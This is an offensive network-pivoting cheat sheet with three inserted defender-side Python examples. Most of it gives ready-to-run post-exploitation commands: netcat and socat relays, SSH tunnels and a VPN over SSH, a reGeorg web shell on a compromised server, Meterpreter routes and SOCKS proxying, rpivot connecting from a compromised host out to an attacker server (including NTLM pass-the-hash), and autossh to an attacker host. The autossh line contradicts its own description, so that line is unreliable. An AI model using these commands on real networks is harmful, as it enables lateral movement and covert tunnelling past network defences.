Network Pivoting Techniques

Basic Pivoting Types

Type               Use case
Listen - Listen    Exposed asset that may not want to connect out.
Listen - Connect   Normal redirect.
Connect - Connect  Can’t bind, so connect out to bridge two hosts.

Listen - Listen

Netcat - Pivot Host

ncat -v -l -p 8080 -c "ncat -v -l -p 9090"

Socat - Pivot Host

socat -v tcp-listen:8080 tcp-listen:9090

Remote host 1

We connect to the first side of the listen->listen trigger and send the file as input.

ncat localhost 8080 < file

Remote host 2

We connect to the second side of the listen->listen trigger and write the output to disk.

ncat localhost 9090 > newfile

Listen - Connect

Netcat - Pivot Host

ncat -l -v -p 8080 -c "ncat localhost 9090"

Socat - Pivot Host

socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090

Remote host 1

We connect to the listen side of the listen->connect trigger and send the file as input.

# ncat takes the destination port as an argument; -p would set the source port instead
ncat localhost 8080 < file

Remote host 2

We wait and listen for the connect from the listen->connect trigger and write the file to disk.

ncat -l -p 9090 > newfile

Connect - Connect

Netcat - Pivot Host

Remote host listeners must be bound first.

ncat localhost 8080 -c "ncat localhost 9090"

Socat - Pivot Host

Remote host listeners must be bound first.

socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090

Remote Host 1

We bind and listen to port 8080 and send the file as input.

ncat -l -p 8080 < file

Remote Host 2

We bind and listen to port 9090 and write the data to disk.

ncat -l -p 9090 > newfile
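As an added defender-side example (not from the original page), the following Python flags the listen->connect relay pattern described above in `ss -tnp` style output: a process name that holds an accepted connection on one of its own listening ports and, at the same time, an outbound connection to another host. The sample socket lines are constructed, not captured from a real host.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of `ss -tnp`; not captured from a real host.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
LISTEN 0      10     0.0.0.0:8080        0.0.0.0:*          users:(("ncat",pid=4242,fd=3))
ESTAB  0      0      10.0.0.5:8080       10.0.0.9:51022     users:(("ncat",pid=4242,fd=4))
ESTAB  0      0      10.0.0.5:39514      10.0.0.20:9090     users:(("ncat",pid=4243,fd=3))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=800,fd=3))
ESTAB  0      0      10.0.0.5:22         10.0.0.9:50112     users:(("sshd",pid=900,fd=4))
ESTAB  0      0      10.0.0.5:44110      10.0.0.30:443      users:(("curl",pid=1200,fd=5))
"""

LINE_RE = re.compile(r'^(\S+)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+users:\(\("([^"]+)",pid=\d+')

def parse_ss(text):
    """Yield (state, local_port, peer_host, peer_port, process_name) per socket line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:          # header line, or a socket without a visible owner
            continue
        state, local, peer, name = m.groups()
        lport = local.rsplit(":", 1)[1]        # rsplit keeps IPv6 "[::]:22" intact
        phost, pport = peer.rsplit(":", 1)
        yield state, lport, phost, pport, name

def find_relays(text):
    """Map process name -> (inbound_ports, outbound_peers) for processes that both
    accept on a port they listen on and connect out. Grouping is by name because
    `ncat -c` runs the second leg in a child process and ss does not show parentage;
    unrelated processes sharing a name are therefore merged (a known limitation)."""
    listening = defaultdict(set)
    established = defaultdict(list)
    for state, lport, phost, pport, name in parse_ss(text):
        if state == "LISTEN":
            listening[name].add(lport)
        elif state == "ESTAB":
            established[name].append((lport, phost, pport))
    relays = {}
    for name, conns in established.items():
        inbound = sorted({lp for lp, _, _ in conns if lp in listening[name]})
        outbound = sorted(f"{h}:{p}" for lp, h, p in conns if lp not in listening[name])
        if inbound and outbound:
            relays[name] = (inbound, outbound)
    return relays

if __name__ == "__main__":
    for name, (inbound, outbound) in find_relays(SAMPLE_SS).items():
        print(f"{name}: accepts on port(s) {inbound}, connects out to {outbound}")
```

The listen->listen and connect->connect variants show up as two listeners or two outbound sockets under the same relay tool name, so the same grouping can be extended to those shapes.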

SSH Tunnels

Dynamic SOCKS Proxy

This can be used with proxychains to forward client traffic through the remote server.

ssh -D8080 [user]@[host]

Local Port Forwarding

This binds [bindaddr]:[port] on the client and forwards connections through the SSH server to [dsthost]:[dstport].

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

This binds [bindaddr]:[port] on the remote server and tunnels connections back through the SSH client side to [localhost]:[localport].

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Establish VPN over SSH

The following options must be enabled on the server side.

PermitRootLogin yes
PermitTunnel yes

ssh [user]@[host] -w any:any

You can see the established tun interface by typing ifconfig -a.

The interfaces and forwarding must still be configured. This assumes that we are going to forward 10.0.0.0/24 through the remote server. We are also assuming that the server’s main connection is through eth0, and that both client and server brought up tun0. This may be different if you already have existing VPN connections.

Client

ip addr add 192.168.5.2/32 peer 192.168.5.1 dev tun0
# Once the server is set up, run the following to add the route
route add -net 10.0.0.0/24 gw 192.168.5.1

Server

ip addr add 192.168.5.1/32 peer 192.168.5.2 dev tun0
sysctl -w net.ipv4.ip_forward=1
# Masquerade traffic arriving from the client's tun0 address (192.168.5.2), not the server's own
iptables -t nat -A POSTROUTING -s 192.168.5.2 -o eth0 -j MASQUERADE
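As an added example (not from the original page), the following Python audits an sshd_config the way sshd resolves it (first occurrence of a directive wins, keywords are case-insensitive, comments are stripped) and reports which of the directives that gate the tunnels on this page are permissive. The two config fragments are constructed: one carries the VPN-enabling settings above, the other a hardened variant; Match-scoped overrides are deliberately ignored.

```python
import re
# OpenSSH defaults for the directives that gate this page's tunnels (-w, -L/-R/-D, GatewayPorts).
DEFAULTS = {"permitrootlogin": "prohibit-password", "permittunnel": "no",
            "allowtcpforwarding": "yes", "gatewayports": "no"}

# Constructed sshd_config fragments: the page's VPN-enabling settings, and a hardened variant.
WEAK_CONFIG = """\
PermitRootLogin yes
PermitTunnel yes
PermitRootLogin no     # ignored: sshd keeps the FIRST value it sees
Match User backup
    PermitTunnel no    # Match-scoped overrides are out of scope for this check
"""
HARDENED_CONFIG = """\
PermitRootLogin prohibit-password
PermitTunnel no
AllowTcpForwarding no
GatewayPorts no
"""

def is_permissive(key, value):
    if key == "permitrootlogin":
        return value == "yes"   # only an outright "yes" is flagged here
    return value != "no"

def effective_settings(text):
    """{keyword: value} as sshd resolves it: comments stripped, keywords case-insensitive,
    first occurrence wins, and parsing stops at the first Match block."""
    seen = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in seen:
            seen[key] = parts[1].strip().lower()
    return seen

def tunnel_surface(text):
    """Directives whose effective value permits tunnelling, e.g. 'permittunnel=yes'."""
    effective = effective_settings(text)
    findings = []
    for key, default in DEFAULTS.items():
        value = effective.get(key, default)
        if is_permissive(key, value):
            findings.append(f"{key}={value}" + ("" if key in effective else " (default)"))
    return findings
```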

Proxychains

The configuration file in /etc/proxychains.conf must be edited to point towards your SOCKS proxy. Typically this is done with an SSH or other type of tunnel. Make sure your ports match.

[ProxyList]
socks4 localhost 8080

Now, to run any network tool through the proxy, just prefix it with proxychains like so. Remember, you can’t run raw-socket scans (SYN scans, ICMP pings) through a SOCKS4 proxy; only full TCP connections traverse it. You need to set up an SSH VPN tunnel or something similar for that type of functionality.

# Connect scan with no host discovery: only full TCP connections traverse a SOCKS proxy
proxychains nmap -sT -Pn 192.168.5.6

Web Shell SOCKSProxy (reGeorg)

reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx, ashx, jsp or php. Simply upload the desired file to the web server.

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

You are now free to use your regular tools using proxychains.

Meterpreter

Meterpreter allows you to create pivoting routes within the framework for use with any of the built-in modules. To add a route automatically, just use the following.

run autoroute -s 192.168.5.1/24

To print the routes:

run autoroute -p

Meterpreter - SOCKS Proxy

Now you can run other tools through Meterpreter using proxychains.

use auxiliary/server/socks4a
set SRVPORT 8080
run
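As an added example (not part of the original page), here is the SOCKS4/4a wire format that both the proxychains entry above and Metasploit's socks4a server speak, written in Python. A request carries only a command (TCP CONNECT or BIND), a port and an IPv4 address or hostname, which is why ICMP pings and raw SYN scans cannot be carried through such a proxy; the decoder also lets a defender identify SOCKS4 handshakes captured on an unexpected listener. The host names and user id are constructed.

```python
import socket
import struct

CONNECT, BIND = 1, 2          # the only commands SOCKS4 defines: TCP connect, TCP bind
GRANTED = 90                  # reply code for "request granted"

def build_request(host, port, userid=b""):
    """Encode a SOCKS4 CONNECT; uses the SOCKS4a form (0.0.0.x address marker plus a
    trailing hostname) when `host` is not a dotted-quad, so the proxy resolves it."""
    try:
        ip, tail = socket.inet_aton(host), b""
    except OSError:
        ip, tail = b"\x00\x00\x00\x01", host.encode() + b"\x00"
    return struct.pack("!BBH", 4, CONNECT, port) + ip + userid + b"\x00" + tail

def parse_request(data):
    """Decode a SOCKS4/4a request (e.g. bytes seen on a suspicious listener) into a dict."""
    if len(data) < 9 or data[0] != 4:
        raise ValueError("not a SOCKS4 request")
    command, port = struct.unpack("!BH", data[1:4])
    if command not in (CONNECT, BIND):
        raise ValueError(f"unknown SOCKS4 command {command}")
    ip = data[4:8]
    end = data.index(b"\x00", 8)               # USERID is NUL-terminated
    userid, rest = data[8:end], data[end + 1:]
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:   # SOCKS4a marker: hostname follows
        host = rest[: rest.index(b"\x00")].decode()
    else:
        host = socket.inet_ntoa(ip)
    return {"command": "CONNECT" if command == CONNECT else "BIND",
            "host": host, "port": port, "userid": userid.decode(errors="replace")}

def parse_reply(data):
    """True if the 8-byte SOCKS4 reply granted the request."""
    if len(data) < 8 or data[0] != 0:
        raise ValueError("not a SOCKS4 reply")
    return data[1] == GRANTED

if __name__ == "__main__":
    req = build_request("192.168.5.6", 80, b"pentest")
    print(req.hex(), parse_request(req))
    print(parse_request(build_request("internal.corp", 443)))
```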

Forward single ports

The following forwards rdesktop sessions from localhost port 3389 to the target 192.168.5.9, using Meterpreter as the tunnel.

portfwd add -L 127.0.0.1 -l 3389 -r 192.168.5.9 -p 3389

Rpivot

Rpivot is a great SOCKS proxy based pivot tool that works like SSH’s dynamic proxy -D option, but in reverse: the compromised host connects out to the attacker's server, which then exposes the SOCKS port.

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

The server now has a SOCKS proxy on port 1080 that forwards traffic through the client.

Through corporate proxy

Rpivot also works through corporate proxies.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

If you prefer passing the hash, then you’re also in luck.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

AutoSSH

AutoSSH is a tool that automatically restarts SSH sessions and tunnels. The following line opens port 2222 on the attacker host and tunnels it to the compromised host on port 22. You can then set up a dynamic SSH SOCKS proxy by connecting to localhost:2222 and forward through the compromised host as normal.

autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 2222:localhost:22 [evil]@[attacker]
